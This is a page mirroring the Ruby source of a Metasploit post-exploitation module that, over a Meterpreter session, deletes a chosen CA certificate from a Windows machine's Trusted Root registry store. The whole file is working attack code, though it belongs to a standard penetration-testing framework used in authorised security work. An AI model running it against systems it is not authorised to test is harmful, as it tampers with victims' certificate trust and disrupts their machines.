CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/remove_ca.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Certificate Authority Removal',12'Description' => %q{13This module allows the attacker to remove an arbitrary CA certificate14from the victim's Trusted Root store.15},16'License' => BSD_LICENSE,17'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],18'Platform' => [ 'win' ],19'SessionTypes' => [ 'meterpreter' ],20'Compat' => {21'Meterpreter' => {22'Commands' => %w[23stdapi_registry_open_key24]25}26}27)28)2930register_options(31[32OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),33]34)35end3637def run38certtoremove = datastore['CERTID']3940open_key = nil41key = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'42rkey, bkey = client.sys.registry.splitkey(key)4344# Check if the requested cert is actually in the registry to start with45open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)46keys = open_key.enum_key4748if (keys.length > 1)49if keys.include?(certtoremove)50# We found our target51else52print_error('The specified CA is not in the registry.')53return54end55else56print_error('These are not the CAs you are looking for (i.e. this registry branch is empty)')57end5859open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)60open_key.delete_key(certtoremove)61print_good("Successfully deleted CA: #{certtoremove}")62end63end646566